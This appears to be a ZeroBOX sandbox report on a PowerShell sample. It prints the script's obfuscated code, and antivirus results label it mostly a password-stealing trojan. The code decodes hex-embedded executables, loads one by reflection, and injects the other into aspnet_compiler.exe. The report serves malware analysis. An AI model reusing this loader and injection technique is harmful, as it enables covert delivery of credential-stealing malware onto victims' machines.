Static | ZeroBOX
No static analysis available.
[String]$HH='4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000180100000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A2400000000000000F1CF37A4B5AE59F7B5AE59F7B5AE59F7BCD6DDF7B4AE59F7F3FFB8F7B0AE59F7B8FC86F797AE59F7B8FCB8F7F9AE59F7B8FCB9F754AE59F7BCD6DAF7B0AE59F7BCD6CAF794AE59F7B5AE58F7FEAF59F7B6D6B9F7B4AE59F7B6D6B8F799AE59F7B8FC82F7B4AE59F7B5AECEF7B4AE59F7B6D687F7B4AE59F752696368B5AE59F7000000000000000000000000000000000000000000000000504500004C01030085E3BB550000000000000000E00002010B010C00009005000010000000E00600206E0C0000F0060000800C000000400000100000000200000500010000000000050001000000000000900C000010000000000000020040810000100000100000000010000010000000000000100000000000000000000000DC820C00B803000000800C00DC0200000000000000000000000000000000000094860C0018000000000000000000000000000000000000000000000000000000000000000000000004700C004800000000000000000000000000000000000000000
Function hghghgh {
[CmdletBinding()]
[OutputType([byte[]])]
param(
[Parameter(Mandatory=$true)] [String]$ybvxcb
$jHVXSH = New-Object -TypeName byte[] -ArgumentList ($ybvxcb.Length / 2)
for ($i = 0; $i -lt $ybvxcb.Length; $i += 2) {
$jHVXSH[$i / 2] = [Convert]::ToByte($ybvxcb.Substring($i, 2), 16)
return [byte[]]$jHVXSH
[String]$H4='4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000800000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A2400000000000000504500004C0103007E826BA70000000000000000E0000E210B01300000F6010000060000000000003E1402000020000000200200000040000020000000020000040000000000000004000000000000000060020000020000000000000300408500001000001000000000100000100000000000000F0000000000000000000000F01302004B000000002002004403000000000000000000000000000000000000004002000C000000B41302001C0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000200000080000000000000000000000082000004800000000000000000000002E7465787400000044F401000020000000F6010000020000000000000000000000000000200000602E7273726300000044030000002002000004000000F80100000000000000000000000000400000402E72656C6F6300000C000000004002000002000000FC010000000000000000000000000040000042000000000000000000
[Byte[]]$H5=hghghgh $H4
[Byte[]]$H6= hghghgh $HH
$RCTHVYJUKILRGCTHVYJBKUNXGRCHTVYJGKHUIL = 'A.B'
$RTDYUFGIOHIJOFUDSESTRDYFUYGIUHOIU5Y4TE5Y6RUT7I = 'C'
$SRDTFYUGIOHJOOHUGYFUTDYRDYTUGIOHJPIUGYUFT ='Ge!!!!!!!!!!!e'.Replace("!!!!!!!!!!!","tTyp")
$RDTFYGUHKILJOIUGYFTDRDYTFYGUH ='In_---------------_e'.Replace("_---------------_","vok")
$STRDYUFGIHIGFDRYTFYGUIHIGUFTYTFUYGU ="Ge+++++++++++++od".Replace("+++++++++++++","tMeth")
$RGHTFJYGKUYJTHRGERHT = 'C:\Windows\Mic_______________\aspnet_compiler.exe'.Replace("_______________","rosoft.NET\Framework\v4.0.30319")
[Reflection.Assembly]::Load($H5).$SRDTFYUGIOHJOOHUGYFUTDYRDYTUGIOHJPIUGYUFT($RCTHVYJUKILRGCTHVYJBKUNXGRCHTVYJGKHUIL).$STRDYUFGIHIGFDRYTFYGUIHIGUFTYTFUYGU($RTDYUFGIOHIJOFUDSESTRDYFUYGIUHOIU5Y4TE5Y6RUT7I).$RDTFYGUHKILJOIUGYFTDRDYTFYGUH($null,[object[]] ($RGHTFJYGKUYJTHRGERHT,$H6))
Antivirus Signature
Bkav Clean
Lionic Clean
ClamAV Clean
CMC Clean
CAT-QuickHeal Clean
McAfee Clean
Malwarebytes Clean
Zillya Clean
Sangfor Clean
K7AntiVirus Clean
K7GW Clean
Baidu Clean
Cyren Clean
Symantec SMG.Heur!gen
ESET-NOD32 Clean
TrendMicro-HouseCall Clean
Avast Script:SNH-gen [Trj]
Cynet Clean
Kaspersky Trojan.PowerShell.Agent.mv
BitDefender Trojan.PWS.Agent.SVM
NANO-Antivirus Clean
SUPERAntiSpyware Clean
MicroWorld-eScan Trojan.PWS.Agent.SVM
Rising Clean
Ad-Aware Trojan.PWS.Agent.SVM
Emsisoft Trojan.PWS.Agent.SVM (B)
Comodo Clean
F-Secure Clean
DrWeb PowerShell.MulDrop.122
VIPRE Clean
TrendMicro Clean
McAfee-GW-Edition Clean
FireEye Trojan.PWS.Agent.SVM
Sophos Clean
Ikarus Clean
GData Trojan.PWS.Agent.SVM
Jiangmin Trojan.PowerShell.Agent.k
Avira Clean
Antiy-AVL Clean
Kingsoft Clean
Gridinsoft Clean
Arcabit Trojan.PWS.Agent.SVM
ViRobot Clean
ZoneAlarm Trojan.PowerShell.Agent.mv
Microsoft Clean
AhnLab-V3 Clean
BitDefenderTheta Clean
ALYac Trojan.PWS.Agent.SVM
MAX malware (ai score=80)
VBA32 Clean
Zoner Clean
Tencent Clean
Yandex Clean
TACHYON Clean
MaxSecure Clean
Fortinet Clean
AVG Script:SNH-gen [Trj]
Panda Clean
Qihoo-360 Clean
No IRMA results available.